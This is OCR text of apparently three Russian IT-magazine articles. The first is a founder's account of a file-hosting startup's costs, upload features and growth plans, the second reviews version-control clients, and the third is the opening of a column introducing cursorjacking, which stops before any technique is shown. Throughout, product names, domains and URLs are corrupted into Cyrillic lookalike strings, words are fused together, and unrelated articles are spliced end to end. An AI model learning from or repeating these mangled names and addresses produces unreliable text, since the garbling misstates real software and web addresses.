последний. В админке скрипта были убраны 
все лимиты (но позже оказалось, что скрипт 
не умеет принимать файлы больше 2 Гб), 
сложная тема была приведена к концепции 
минимализма (для этого в шаблонах были 
удалены все визуальные элементы, кроме 
кнопки «СІрІоасІ» и формы логина). Нужно 
было еще название и домен. Примерно за 
полгода до этого я устраивал на сервисе 
уоибо.ги конкурс на лучшее название для 
другого бизнеса. Одним из вариантов был 
«пекака.сот». Мне такое название очень 
понравилось, но оно совершенно не годилось 
для серьезного сервиса. А вот для стартапа 
нового типа — в самый раз (чем оно хуже 
УаЬоо, Ооодіе или Вабоо?). Короче говоря, 
с этого момента сервис, в первом своем 
представлении, начал работу. 

Не терпелось погонять его на первой 
волне пользователей. Экспериментальны- 



ТЕКУЩЕЕ СОСТОЯНИЕ БИЗНЕСА 



На момент написания статьи ежемесячные 
расходы составляют: 

• Сервер — 600$; 

• Программист— 1800$; 

• Трафик 1500 Мбит/с — 1800$; 

• Итого — 4200$. 

Бизнес-параметры: 

• Заполненностьсервера — 33%; 

• Количество регистраций — 800; 

• Количество платных пользователей — 
200 (1200 $ в месяц). 

Экстраполируя заполняемость до 100%, 



мы получим 600 + 1800*3 = 6000 $ расходов 
с каждого сервера и 1200*3 = 3600 $ доходов. 
И по мере дальнейшего роста мы будем 
продолжать уходить в минус на 2400 $ 
с каждого сервера, пока не разоримся. Но 
на самом деле это не так :). Во-первых, мы 
раздали на Лепре 3000 премиум-аккаунтов. 
Во-вторых, конвертация сейчас происходит 
только по исчерпании свободного места 
(как в ОгорЬох) и совсем не происходит при 
скачивании и продаже дополнительного 
функционала (как в КарісІБЬаге). Кроме того, 
количество аккаунтов, в которых скоро 
кончится место, постоянно растет. А это 



значит, что соотношение платных/бесплатных 
аккаунтов будет постепенно смещаться в нашу 
пользу. Среднесрочная задача — вывести 
эффективность сервера (сейчас это -1200 $) 
в плюс и за счет роста количества серверов 
вывести весь бизнес в прибыль. 

Всё в наших руках — неумение обращаться 
с пользователями способно их всех 
распугать; а правильное изменение в сервисе 
и продуманная бизнес-модель способны 
привести как пользователей, так и владельцев 
проекта к сервису, который им по душе. Если 
будет возможность, обязательно сообщим, 
какое развитие получила ситуация. 
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МИ группами были выбраны Лепрозорий 
и Хабрахабр — креативщики и технари 
соответственно. Посты были предельно про- 
стыми: «Вот файлхостинг без рекламы, без 
задержек скачивания и прочих раздражите- 
лей — пользуйтесь! Если понравится, буду 
развивать сервис». Результат превзошел 
все ожидания: 3000 регистраций и золотой 
пост на Лепре. Прозвучало мнение, что люди 
готовы платить за сервис даже в таком виде! 
Учитывая растущую популярность ОгорЬох, 
а также осознавая, что над Медаиріоаб, 
Но^ііе и прочей компанией висит Дамоклов 
меч копирайта, я понял, что потребность 
в простом и удобном сервисе огромная, — 
стало быть, надо двигаться далее. 



ПЕРВЫЕ ШАГИ 

Дефолтный скрипт едва ли годился для 
дальнейшего развития сервиса, тем более 
в голове была масса полезных фич, которые 
нужно было реализовать для концепции 
«самый удобный сервис для обмена файлами» 
(о них — чуть позже). Нужен был програм- 
мист, готовый все это реализовать. Пошуршав 
раздел резюме на Хабре, я нашел десяток 
кандидатов на роль программиста. Три челове- 
ка дошли до этапа тестового задания. Задание 
заключалось в том, чтобы добавить сортировку 
пользователей по нужному параметру в суще- 
ствующей админке и исправить мелкий баг 
в текущем скрипте. Это была хорошая провер- 
ка, во-первых, готовности человека работать 
с чужим кодом (обычно отвечают: «Не-не-не, 
давайте я все заново напишу», и в ближайшие 
два-три месяца вам не узнать, хороший кодер 
или плохой). А во-вторых, готовности работать 
без подробного ТЗ — это уже мой стиль руко- 
водства на небольших проектах. В больших 
проектах задача спускается с технического 
директора на ІеатІеасІ'а, обрастая по дороге 
конкретикой, и кодеру над проектированием 
уже особо думать не надо. Но в нашем случае 
это непозволительная роскошь. Дизайнер, 
в котором также явно была потребность, был 
выбран на І^гееіапсе.ги. Здесь все получилось 
менее гладко, чем с кодером: человек, сделав- 
ший концепт, сказал, что больше заниматься 
проектом не хочет, и заканчивать пришлось 
другому дизайнеру. В итоге за пару месяцев 
и 1000 долларов был нарисован текущий ди- 
зайн. Программиста к этому времени перевели 
на фултайм за 50 000 рублей в месяц, а сервер 
заменили на более серьезную машину с 24x2 
Тб дисками и подключили второй гигабит 
(первый иногда уже забивался). Сейчас сервис 
работает на двухгигабитном канале в Амстер- 
даме. В перспективе — расширение до 10 Гбит, 
подключение зеркала в США и выбор разных 
провайдеров на странице скачивания. В нашу 
бизнес-модель вписано, что сервис должен 
окупаться без рекламы, задержек скачива- 
ния и в целом должен продавать услуги за 
счет выстраивания долгосрочных отношений 
с пользователем (то есть пользователю удобно 
у нас, но уже не хватает бесплатных 5-10 Гб, 
и он покупает премиум-аккаунт — 100 Гб). 
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Когда трафик стал зашкаливать за 800 Мбит/с, было решено подключить второй гигабитный канал 




Важной фишкой стало большое количество 
способов для загрузки на сервис, о которых я 
хочу рассказать подробнее. 

РАЗНЫЕ СПОСОБЫ ЗАГРУ^ 

Существует четыре способа выложить в Сеть 
файл: 

1. Классическая загрузка через веб- 
интерфейс. В современных браузерах 
файлы можно перетаскивать в ОгорАгеа, 

в том числе несколько файлов одновремен- 
но. Ссылку для скачивания ты получаешь 
немедленно, не дожидаясь конца загрузки 
(это удобно, если файл большой). Работает 
без регистрации, но если зарегистриру- 
ешься или залогинишься, то сразу после 
загрузки файлы окажутся в папке «Му ПІез», 
не потеряешь. 

2. Загрузка через е-таіі. При регистрации 
тебе выделяется адрес вида изегпатеЙ 
иріоаб.пекака.сот, и все файлы с аттачем 
будут сохранены в твоем пекака-аккаунте. 
Уведомление о новых файлах придет на 
обычный е-таіІ. Удобно как переправлять 
файлы из своей почты, так и давать этот 
адрес друзьям или, например, выклады- 
вать в блоге для сбора каких-либо файлов, 
которые при включенной синхронизации 
будут складываться в нужную папку на 
твоем компьютере. Письма без аттача не 
принимаются. 

3. Загрузка через Іоггепі. Мы скачиваем на 
гигабитных каналах нужный Іоггепі, а ты 
получаешь прямую ссылку на него или, 

в случае с синхронизацией, получаешь 
его в свою папку. Если этот торрент уже 
загружал нам кто-то из пользователей, то 
ты мгновенно получаешь ссылку на него. 
Выглядит так, будто 10-гигабайтный файл 
скачался за пару секунд. 

4. Загрузка через РТР. Так же как и в случае 
с е-таіІ, ты можешь выложить доступ 

в блоги, и твои читатели смогутзалить 
нужные файлы. В этом РТР-аккаунте права 
только на запись. Смотреть содержимое 
папок и скачивать файл нельзя. Перед ис- 
пользованием не забудь активировать эту 
функцию, и все закинутые на этот диск фай- 



лы будут доступны и в «Му Рііез» на Мекака. 
сот, и на всех устройствах, на которых ты 
подключил этот диск. 

Все описанные функции доступны в бес- 
платных аккаунтах. 

КУДА ДВИГАТЬСЯ? 

Для любого из читателей X подключение 
сетевого диска через 5АМВА или РТР — 
простейшая операция, но обычного пользо- 
вателя такие действия, даже с подробной 
инструкцией, могут ввести в ступор. Особенно 
если учесть, что в самой системе могут быть 
отключены необходимые протоколы или 
на корпоративном файрволе фильтруются 
нужные порты. В связи с этим самая главная 
задача бизнеса сейчас — это релиз клиен- 
та под ѴѴіпбоѵѵз и Мае 05 X, которые будут 
сами выбирать нужный порт и протокол, 
автоматически обновляться, иметь функции 
управления аккаунтом и в общем и целом не 
отвлекать юзера от счастья пользоваться 
нашим сервисом :). Одновременно в разработ- 
ке находятся приложения под І05 и АпсІгоіеІ. 

На волне всеобщей мобилизации интернета 
это просто тизі. Уже сейчас 40% населения 
США заходят в Сеть только через мобильные 
устройства. Игнорировать этот тренд — са- 
моубийство. Все мобильные и десктопные 
клиенты работают через единый АРІ, который 
в ближайшем будущем мы планируем открыть 
и для сторонних разработчиков. Это позволит 
воспользоваться нашими техническими воз- 
можностями создателям стартапов, а удобные 
утилиты, которые, как мы надеемся, обяза- 
тельно появятся, увеличат комфорт наших 
пользователей. Если кто-то создаст свой ком- 
мерческий сервис на Мекака АРІ, мы будем 
только рады и готовы всячески помогать. 

МИЛЛИОН, миллион, миллион... 

Что касается бизнес-составляющей проекта, 
то здесь стратегические задачи — увеличить 
количество пользователей до миллиона 
и вывести проект на самоокупаемость. 

Сейчас рост пользовательской базы 
составляет 1000 человек в неделю, при 
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Каким должен быть файлхостинг? 




После ухода поста с главной Лепры уровень среднесуточного трафика повысился и уже не возвращался на уровень до пика. Вывод: сервис востребован, новый дизайн и функционал 
встречены позитивно 



нулевых усилиях с нашей стороны (никакой 
рекламы нигде не размещаем, фактически 
после релиза дизайна полгода назад эта 
статья — первое появление на публике). Не- 
трудно посчитать, что при текущей скорости 
роста для регистрации одного миллиона 
пользователей нам потребуется подождать 
1000 недель, то есть около 20 лет. Чтобы не 
умереть со скуки за 20 лет, нам требуется 
влить новую волну пользователей, чтобы 
снежный ком довольных клиентов увеличил- 
ся хотя бы до 10 тысяч регистраций в неделю. 
Здесь я вижу несколько вариантов. 

Запуск партнерской программы. В этой 
области у нас многолетний опыт, и данный 
вариант самый железобетонный — платить 
пользователям и партнерам за скачивание 
их файлов. Часть скачиваний всегда конвер- 
тируется в регистрации, а часть регистраций 
всегда конвертируется в платных пользова- 
телей. Исключение возможно только одно: 
наш партнер — читер. Математика простая: 
например, мы платим пользователю 20 
долларов за 1000 скачиваний. Если скачива- 
ние конвертится в реги с ратио 1:20, то одна 
регистрация нам обойдется в 20/(1000/20) = 
0,4 $. То есть партнеры готовы поставить нам 
один миллион пользователей за 400 тысяч 
долларов. Сумма внушительная. Но если 
один из 50 зарегистрировавшихся купит 
премиум-аккаунт за 6 долларов, то 400 тысяч 
превращаются уже в (20 - 6)/(1 000/20)*1 000 
000 = 280 тысяч баксов. А если конверт рег 
в премиумы будет не 1:50, а 1:12, то, полу- 
чив миллион новых рег, мы еще и получим 
прибыль в размере 200 тысяч. А конверт за - 
виситтолько от качества трафика и дизайна 
лендинга — страницы, на которую направ- 
ляется трафик. В нашем случае это страни- 
ца скачивания. Эти параметры полностью 
в наших руках, так как партнеров с некаче- 
ственным трафом мы имеем право исключать 
из ПП. Конечно, не все показатели конверта 
достижимы, но в общем и целом партнерка — 
оптимальный способ продвижения такого 
типа проектов. Кроме этого, нужно учесть, 
что при такой массовой закупке трафа снеж- 



ный ком органических регистраций также 
должен увеличиться, что снизит затраты по 
достижению заветного миллиона. Серьезным 
минусом этого способа раскрутки является 
чрезмерная жажда наживы среди малоопыт- 
ных партнеров. Обязательно найдутся люди, 
которые начнут выкладывать на популярные 
ресурсы пиратское ПО и защищенные копи- 
райтом видеоклипы известных исполните- 
лей. А со стороны будет выглядеть, что мы им 
за это еще и платим. И несмотря на то, что мы 
будем таких партнеров нещадно банить, риск 
получить репутацию тедаиріоасі.сопп все 
равно присутствует. На данный же момент 
мы получаем одну абузу на копирайт в два 
месяца, то есть уровень нулевой. 

Вторым способом достижения постав- 
ленной задачи является выкуп трафика 
у существующих файлообменных сетей. 
Схема может быть следующая: пользователь 
заливает файл на ЛІеЬозІіпд.сопп, а ссылка 
на скачивание ему выдается на пекака.сот 
(файл тем временем заливается через АРІ 
к нам). По большому счету это та же самая 
партнерка, только здесь мы можем выбирать, 
какие файлы нам нужны, а какие нет (цель — 
снять риск копирайт-абуз). Также существует 
возможность договориться о неденежном 
сотрудничестве — вы нам миллион поль- 
зователей, а мы вам — процент от проекта. 
Минус в том, что с крупными игроками можно 
в итоге так и не договориться, потратив кучу 
времени на переговоры. 

Третьим способом является классическое 
продвижение — реклама в соцсетях, за- 
купка баннеров, вывод в топ-10 Соодіе и так 
далее. Самый дорогой и непредсказуемый 
в плане отдачи способ, при этом самый по- 
пулярный. Оно и понятно — сотни компаний 
помогут вам потратить кучу денег на любой 
из этих способов продвижения. Однако 
даже если ты отдашь 400 тысяч на класси- 
ческое продвижение, никто не сможеттебе 
гарантировать никаких результатов. Кроме, 
конечно, того, что все деньги будут потра- 
чены :). Из плюсов — это самый имиджевый 
вариант, так как крупнейшие рекламодатели 



тратят космические бюджеты именно в этом 
направлении. 

Четвертый вариант является скорее 
катализатором роста, а не источником новой 
волны — поощрять пользователей за пост 
о нас в соцсетях, а также за приглашение 
друзей в сервис. За каждое действие давать 
300-500 мегабайт дополнительного места. Это 
позволит, не увеличивая финансовых затрат, 
повысить скорость роста органических рег. 
Комбинацией из каких способов мы достигнем 
количества пользователей в один миллион — 
покажут эксперименты. Если статья найдет 
отклик, то расскажем, что удалось сделать. 

Что касается выхода в прибыль, то здесь, 
как ни странно, задача проще, потому что, 
как говорится, был бы трафик, а монетиза- 
ция найдется. Большая пользовательская 
база покажет более четкие требования 
к бизнес-модели. Ключ к выявлению этих 
требований — подробнейшее профилирова- 
ние параметров бизнеса. Мы должны четко 
знать, какие изменения в проекте к каким 
последствиям привели. Например, если у нас 
будет 90% бесплатных пользователей, то при 
миллионе регистраций у нас будет доход 600 
тысяч в месяц. А при уровне халявщиков 98% 
доход будет уже 120 тысяч. А нам оплачивать 
всё те же сотни серверов, десятки гигабит 
пользователей, зарплаты и так далее, что 
может привести к росту тарифов. Но это, черт 
подери, приятные хлопоты. Развивать свой 
сервис, общаться с пользователями и верить 
в успех — нам это нравится! ^ 



ДЕСЕРТ ДЛЯ ЧИТАТЕЛЕЙ! 

Для того чтобы получить бесплатный преимум- 
аккаунт на три месяца, всё, что вам нужно, — 
это зарегистрироваться по специальной ссылке 
пекака.сот/гед/х . Ссылка будет работать до 
31.07.2012. 
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Антон Жуков 



Все под контролем 

ВЫБИРАЕМ ЛУЧШИЕ КЛИЕНТЫ ДЛЯ РАБОТЫ 
С РАЗЛИЧНЫМИ СИСТЕМАМИ КОНТРОЛЯ ВЕРСИЙ 




Разработка любого крупного проек- 
та не обходится без использования 
системы контроля версий. Удобство 
работы напрямую зависит от инстру- 
ментов, которые ты применяешь для 
взаимодействия с хранилищем кода. 
Мы решили рассказать о наиболее 
удачных клиентах под ѴѴіпсІоѵѵз для 
популярных систем контроля версий: 
СѴ5, 5ѴМ, 6ІІ, МегсигіаІ. 



ели ТЫ думаешь, что раз ты не работаешь над крупными проектами, 
то и система контроля версий тебе не нужна, — ты ошибаешься. Нет, 
ты, конечно, можешь раскидывать изменяющиеся сорцы по папкам 
и давать им соответствующие названия: рго]ес1, рго]ес1_о1с1, рго]ес1_о1с1ег5... 
или рго]'ес11, рго]'ес11.1, рго]'ес11.2. Но что делать, если понадобится выяснить, 
чем отличается последняя версия от предыдущей? Вручную анализировать 
код двух проектов? Или, например, нужно откатить изменения в каком-то 
файле до определенной версии. Тут-то и понимаешь, как удобно использо- 
вать систему контроля версий. Скажу тебе больше — она упрощает жизнь не 
только программисту, но и рядовому пользователю. Работая, например, над 
документом ѴѴогб, можно не плодить множество файлов, а последовательно 
фиксировать все изменения с возможностью последующего отката к пред- 
ыдущим версиям. Продуктивность и удобство работы с системой контроля 
версий напрямую зависит от используемого клиента, поэтому сегодня мы 
рассмотрим наиболее популярные системы и клиенты для работы с ними. 




СѴ5 



Начнем, пожалуй, с одной из самых 
распространенных систем управления 
версиями — СѴ5. Она создавалась для 
совместной работы над С-компилятором 
АСК (Атзіегсіапп Сотрііег К\\] и изначально 
называлась сті (от слова соттіі). График 
Дика Груна и двух его студентов, которые 
трудились над компилятором, был настоль- 
ко плотным, что работать они могли только 
в разное время, а этот инструмент позволял 
им фиксировать версии независимо. 

В последующем инструмент был 
представлен общественности, получил на- 
звание СѴ5 и активно развивался вплоть 
до 2008 года. В настоящее время активная 
разработка системы прекращена. А раз- 
работчики все чаще используют более 
современные альтернативы, свободные от 
недостатков СѴ5. Кстати, о недостатках, 
вот главные: 

• невозможность переименования файла 
или директории так, чтобы это измене- 
ние было отражено в истории; ограни- 
ченная поддержка юникода и не-А5С11 
имен; 

• публикации изменений неатомарны; 

• неэффективноехранение бинарных 
файлов. 

Несмотря на недостатки, списывать 
СѴ5 со счетов пока еще рано, поэтому 
рассмотрим несколько наиболее удачных 
клиентов для работы с ней. 




Т0РТ0І5ЕСѴ5.0Р6 



Одна из наиболее удобных программ для 
работы с СѴ5 — ТогІоізеСѴВ, главное досто- 
инство которой — качественное встраивание 
в оболочку ѴѴіпсІоѵѵз, в результате чего многие 
операции с СѴ5 можно производить непо- 
средственно через проводник. Еще одним 
достоинством является то, что для файлов 
под контролем СѴ5 автоматически изменяет- 
ся вид пиктограмм в зависимости от их СѴ5- 
статуса (не изменен, изменен, неизвестный 
файл). Одним словом, удобностей очень мно- 
го. Причем наличие ТогІоізеСѴЗ не лишает 
возможности работы с СѴ5 через командную 
строку, поскольку сама «черепаха» суть ОШ- 
оболочка, которая вызывает консольную про- 
грамму сѵз.ехе и лишь отображает в удобном 
виде результаты ее работы. 




ѴѴіпСѴБ 

СѴ5биі.50иКСЕР0Р6Е.МЕТ 

в отличие от ТогІоізеСѴВ, встраивающейся 
в контекстное меню, ѴѴіпСѴВ представляет 
собой отдельное приложение. Продуманный 
интерфейс позволяет специалистам исполь- 
зовать всю мощь СѴ5, а новичкам быстро 
обучиться использованию данной системы 
контроля версий. Благодаря встроенной 
поддержке скриптов легко автоматизиро- 
вать, расширять и настраивать выполнение 
общих задач. ѴѴіпСѴБ поддерживает ко- 
мандную строку, которая дает возможность 
выполнять любые СѴ5-команды. Позволяет 
просматривать изменения в файлах с помо- 
щью встроенной сііі'і'-утилиты (можно задать 
свою). Умеет отображать историю коммитов 
в виде графа. Поддерживает работу как 
с текстовыми, так и с бинарными файлами. 
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Все под контролем 



5иЬѵег$іоп (5ѴМ) 



ЗиЬѵегзіоп — свободная централизован- 
ная система управления версиями, вы- 
пущенная в 2004 году компанией СоІІаЬМеІ 
Іпс. Создавалась она для того, чтобы 
заменить распространенную на тот момент 
систему СѴ5. Поэтому 5ѴМ реализует все 
основные функции СѴ5 и избавлена от 
ряда ее недостатков. О большой популяр- 
ности этой системы говорит то, что ей 
отдают предпочтение многие сообщества 
разработчиков открытого программного 
обеспечения. Наиболее известные про- 
екты, использующие 5ѴМ: АрасЬе, 6СС, 
Ргее РазсаІ, РуіЬоп, РиЬу, РгееВЗО, Наіки, 
АР05 и МесІіаѴѴікі. Однако, несмотря на 
свою распространенность и популярность, 
ЗиЬѵегзіоп все же не лишена некоторых 
недостатков: 

• проблемы при переименовании 
файлов — ЗиЬѵегзіоп не всегда может 
правильно обработать операции 
переименования файлов, если одновре- 
менно с переименованием изменяется 

и содержимое файла; 

• слабая поддержка слияния ветвей. До 
версии 1.5 все такие операции пользо- 
вателям вообще приходилосьотсле- 
живать вручную, с помощью подробных 
записей в журнале изменений; 

• невозможностьудаленияданныхиз 
хранилища — информация, однажды 
помещенная вхранилищеЗиЬѵегБІоп, 
остаетсятам навсегда:файл можноуда- 
лить в текущей ревизии, но всегда есть 
возможность получить из хранилища 
одну из предыдущих ревизий, в которых 
файл существовал; 

• папка .5ѴП в каждой папке проекта 
засоряет файловую структуру. Поэтому 
начиная с версии 1.7 в корне рабочей ко- 
пии проекта создается одна директория 
«.5ѴП», метаданные в которой сохраня- 
ются сиспользованиемЗОЫіе. 




Тог(оІ5е5ѴМ 

Т0РТ0І5Е5ѴМ.МЕТ 

Простой в использовании клиент для системы контроля версий, по праву считающийся одним 
из лучших ЗиЬѵегзіоп-клиентов для ѴѴіпсІоѵѵз. Так же как и ТогІоізеСѴЗ, реализован в качестве 
расширения оболочки ѴѴіпсІоѵѵз. Поскольку данный клиент не является расширением какой-либо 
ЮЕ, то его можно использовать с любыми средами разработки. Среди многочисленных плюсов 
программы стоит отметить самые важные: 

• поддержка работы с основными ЗиЬѵегзіоп-протоколами; 

• для работы нетребуется ЮЕ; 

• возможностьинтеграции сбагтрекинговыми системами; 

• информационные значки на иконках файлов для индикации состояния файла; 

• атомарныефиксации; 

• интерфейслокализован для множества языков. 




ѴізиаІЗѴМ 

ѵѵѵѵѵѵ.ѵізидізѵм.сом 

Также достаточно популярный ЗиЬѵегзіоп-клиент в виде 
плагина для ѴізиаІ Зіисііо, предоставляющего интерфейс 
для выполнения всех необходимых действий прямо из ЮЕ. 
Поддерживает ѴізиаІ Біисііо 2005, 2008, 2010. Меню про- 
граммы содержит ссылки на обычные функции ТогІоізеЗѴМ: 
просмотр репозитория, создание и применение исправ- 
лений, вывод журнала ЗиЬѵегзіоп, а также ветвление, 
слияние и переключение хранилищ. ѴізиаІЗѴМ реализует 
частую и раннюю проверку, позволяющую избежать про- 
блем в будущем, — он будет постоянно напоминать, что есть 
непроверенные изменения. Благодаря этому он улучшает 
производительность и уменьшает возможность типовых 
ошибок. Единственным недостатком этого клиента является 
то, что он платный. 






Все 

упомянутые 
в статье 
программы 
ты найдешь 
на нашем 
диске. 
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РС20ЫЕ 




Распределенная система управления 
версиями файлов, созданная Линусом 
Торвальдсом для управления разработкой 
ядра Ыпих. Система спроектирована как 
набор программ, специально разработанных 
с учетом их использования в скриптах. Это 
позволяет удобно создавать специализиро- 
ванные системы контроля версий на базе Сіі 
или пользовательские интерфейсы. Сіі под- 
держивает быстрое разделение и слияние 
версий, включает инструменты для визуали- 
зации и навигации по нелинейной истории 
разработки. Каки Оагсз, ВіЖеерег, МегсигіаІ, 
Вагааг и Мопоіопе, Сіі предоставляет каж- 
дому разработчику локальную копию всей 
истории разработки, изменения копируются 
из одного репозитория в другой. Ядро біі 
представляет собой набор утилит команд- 
ной строки с параметрами. Все настройки 
хранятся в текстовых файлах конфигурации. 
Такая реализация делает біі легко портируе- 
мым на любую платформу и дает возмож- 
ность легко интегрировать біі в другие. 

Как и у любой другой системы контроля 
версий, у 6і( есть свои преимущества 
и недостатки. Преимущества: 

• высокая производительность; 

• развитыесредства интеграции с другими 
ѴС5, в частности с СѴ5, 5ѴМ и МегсигіаІ; 

• продуманная система команд, позволяю- 
щая удобно встраивать 6ІІ в скрипты; 

• качественный веб-интерфейс«из короб- 
ки»; 

• репозитории 6ІІ могут распространяться 
и обновляться общесистемными файло- 
выми утилитами архивации и обновле- 
ния, такими какгзупс. 

Среди недостатков обычно 
отмечают следующие: 

• отсутствие переносимой на другие 
операционныесистемы поддержки путей 
в кодировке ІІпісосІе в МісгозоЙ ѴѴіпсІоѵѵз; 

• использованиедля идентификации реви- 
зий хешей 5НА1, что приводит к необходи- 
мости оперировать длинными строками 
вместо коротких номеров версий; 

• отсутствие отдельной команды переиме- 
нования/переноса файла, которая ото- 
бражаласьбы в истории каксоответ- 
ствующее единое действие; 

• система работаеттолько с файлами и их 
содержимым и неотслеживаетпустые 
каталоги. 

Несмотря на свои небольшие недостатки, 
0ІІ очень популярна и используется во 
многих крупных проектах, таких как: ядро 
Ыпих, ОгираІ, Саіго, СМІІ Соге ІЛіІіІіез, 

Меза, ѴѴіпе, СЬготіит, СотрІ 2 Ризіоп, 
РІідЬЖеаг, ]0иегу, РНР. 



6ІТ ИСПОЛЬЗУЕТСЯ В ТАКИХ ПРОЕКТАХ, 
КАК: ЯДРО СІМОХ, ОЯУРАІ, САІЯО, ОМУ СОРЕ 
УТІЫТІЕЗ, МЕ5А, ѴѴІМЕ, СНРОМІУМ, СОМРІ2 
РУ5І0М, РСІ6НТСЕАР, ^О^ЕРУ, РНР 





БтагІбИ ТогІоізеСИ 



ѴѴѴѴѴѴ.5ѴМТЕѴ0.С0М/5МАРТбІТ/т0ЕХ.НТМІ 

Кроссплатформенный клиент для біі, на- 
писанный на Эаѵа. Реализует все функции 
0ІІ, наглядно показывает дерево коммитов, 
позволяет взаимодействовать с біШиЬ. Кро- 
ме СіЖиЬ, поддерживаются еще следующие 
хостинги проектов: АззетЫа, Веапзіаік, 
СобеЬазе, ІІпІ'исІсІІе. Предоставляет опти- 
мальное отображение текущего состояния 
рабочей копии проекта: при первом взгляде 
становится ясно, какие файлы были добав- 
лены, изменены или удалены. Очень удобно 
реализована сіі^і'-функция, наглядно пока- 
зывающая, какие изменения были внесены 
в тот или иной файл. Из-за того что клиент 
написан на Эаѵа, некоторые пользователи 
жалуются на несколько «задумчивое» пове- 
дение программы. Сказать честно, я никаких 
подтормаживаний не заметил, может, пото- 
му, что пользовался ЗппагіСіІ недолго. 



С00Е.60061Е.С0М/Р/Т0РТ0І5Е6ІТ 

Визуальный клиент системы управления ис- 
ходными кодами программ біі для ОС МісгозоЙ 
ѴѴіпбоѵѵз. Особенно понравится тем, кто имел 
опыт работы с 5ѴМ и использовал ТогІоізеВѴМ 
(или пользовался Тогііозе-клиентами для 
других ѴС5), так как интерфейс будет прак- 
тически идентичен. Вызов программы также 
осуществляется через контекстное меню, 
поддерживаются пиктограммы, отображаю- 
щие текущее состояние каждого файла. Для 
работы программы требуется установленный 
МЗузСіІ — консольный клиент Сіі для ѴѴіпбоѵѵз, 
так как ТогІоізеСіІ только запускает консоль- 
ную команду из МВузСіІ и рисует в окошко ее 
вывод. Если не хочешь или просто не хватает 
времени детально разобраться в консольных 
командах СіС то ТогІоізеСіІ — то, что нужно. 



КОНВЕРТИРУЕМ РЕПОЗИТОРИИ С ПОМОЩЬЮ СѴ525ѴЫ 



Если ты хочешь быстро перейти с СѴ5 на 5ѴМ, то рекомендую воспользоваться программкой 
СѴ525ѴП ( сѵ525ѵп.1ідгІ5.огд 1. Она предназначена для преобразования репозитория СѴ5 
в готовый репозиторий ЗиЬѵегзіоп (либо в репозиторий Оіі) или в текстовый дамп, который 
можно затем импортировать в репозиторий при помощи утилиты зѵпасітіп. При этом сѵ52зѵп 
сохраняет всю информацию, содержащуюся в репозитории СѴ5: ветви, метки, описания 
изменений, имена авторов, даты фиксации изменений. Кроме того, изменения в различных 
файлах, зафиксированные совместно, преобразуются в одну ревизию. 
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Все под контролем 



МегсигіаІ (Нд) 



МегсигіаІ, он же Нд, — кросс- 
платформенная распределенная 
система управления версиями, 
разработанная для эффектив- 
ной работы с очень большими 
репозиториями кода. Написана 
на РуіЬоп, хотя чувствительные 
к производительности части 
(например, своя реализация сІіІ'Я 
выполнены в качестве расшире- 
ний на С. 

МегсигіаІ первоначально 
был написан для Ыпих, позже 
портирован под ѴѴіпсІоѵѵз, Мае 05 
X и большинство ОМІХ-систем. 
Наряду с традиционными воз- 
можностями систем контроля 
версий, МегсигіаІ поддерживает 
полностью децентрализованную 
работу (отсутствует понятие 
основного хранилища кода), 
ветвление (возможность вести 
несколько веток одного проекта 
и копировать изменения между 
ветками), слияние репозиториев 
(чем и достигается «распреде- 
ленность» работы). 



ѴізиаІНС 

5НАРЕ50иРСЕ.0Рб/ 

РР0^ЕСТ/VI5^А^Н6/ 

Если не хочется пользоваться сто- 
ронней утилитой, а хочется комми- 
тить прямо из среды разработки, то 
рекомендую обратить внимание на 
эту программку. ѴізиаІНС представ- 
ляет собой плагин для ѴізиаІ Зіисііо 
(М5Ѵ5 2005, М5Ѵ5 2008 и М5Ѵ5 
2010), который позволяет рабо- 
тать с МегсигіаІ-репозиториями 
прямо из ЮЕ. Как и все остальные 
клиенты, он умеет показывать 
историю изменений, отображать 
различия между разными версиями 
одного файла. Подсвечивает со- 
стояние каждого файла в дереве 
проекта. Вызвать ѴізиаІНС можно 
из контекстного меню или непо- 
средственно с панели тулбара. 

В отличие отѴізиаІБѴМ, является 
абсолютно бесплатным продуктом, 
что, вкупе судебным интерфейсом, 
делает его очень популярным кли- 
ентом для работы с МегсигіаІ. 




ТогІоізеНд 

(ТОКТОІЗЕНб.ВІТВиСКЕТ.ОРб) 

Графический фронтенддля системы контроля версий 
МегсигіаІ. Представляет собой расширение для обо- 
лочки ѴѴіпсІоѵѵз и вызывается из контекстного меню. 
Интерфейс приложения прост и понятен. Если ты 
уже работал с ТогІоізеЗѴМ или Тогііозебіі, у тебя не 



возникнет вообще никаких трудностей в процессе 
работы с приложением. ТогІоізеНд поддерживает все 
функции МегсигіаІ, оборачивая их в продуманный ин- 
терфейс. Наглядно отображает историю изменений, 
показывает, какие правки были внесены в файл. Как 
и остальные Тогіоізе-клиенты, использует пикто- 
граммы для отображения статуса файлов, что по- 
зволяет буквально за пару секунд определить, какие 
файлы были изменены или добавлены. 




ЗАКЛЮЧЕНИЕ 

В рамках неболь- 
шой статьи трудно 
рассмотреть все 
существующие систе- 
мы контроля версий 
и клиенты для работы 
с ними. Поэтому мы 
выбрали лишь самые 
популярные. Как 
видишь, недостатка 
в системах контроля 
версий нет. Какую вы- 
брать для разработки 
своего проекта — за- 
висит только оттебя. 
Но в любом случае, 
какую бы систему ни 
выбрал, ты всегда 
можешь найти под нее 
хороший клиент. ^ 
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взлом/ ЕА5УНАСК 



Алексей «бгеепОод» Тюрин, Оідііаі Зесигііу (іѵѵіиег.сот/апіуигіп) 




ПОДДЕЛАТЬ ДЕЙСТВИЯ ПОЛЬЗОВАТЕЛЯ, 
ИСПОЛЬЗУЯ С^Я50Я^АСКIN6 




ЗАДАЧА 



РЕШЕНИЕ 

Пару номеров назад мы коснулись такой темы, как иі-гесігеззіпд 
и сІіск]аскіпд. Данные виды атаки нацелены на то, чтобы, используя 
широкие возможности НТМІ, С55 и ^аѵа5сгір^, обмануть пользовате- 
ля. То есть пользователь делает что-то одно, а на самом деле проис- 
ходит что-то другое. Простейший, хотя уже не рабочий пример — это 
когда пользователь нажимает на хакерском сайте какую-то ссылку, 
а по факту он нажимает на кнопочку РасеЬоок-лайка хакерского сайта 
от своего аккаунта. Получается лайконакрутка. Но с той темой мы уже 
разобрались. Да и защита, посредством І^гаппе-Ьизііпд'а и правильных 
серверных заголовков (Х-Ргате-Орііопз), запрещающих загрузку 
атакуемого сайта в фрейме (а на этом и строится атака), внедрена 
на большинстве продвинутых сайтов. Сегодня же мы познакомимся 
с подвидом иі-гебгеззіпд'а. Думаю, из заголовка понятно, что связан 
он с курсором мыши. Техника относительно молода, и фактически от 
нее нет защиты. Но все же она специфична и кривовата, а потому на- 
целена на не самого внимательного пользователя. 

Подавай перейдем к делу. 

Основная фича этой атаки — манипуляции с отображением 
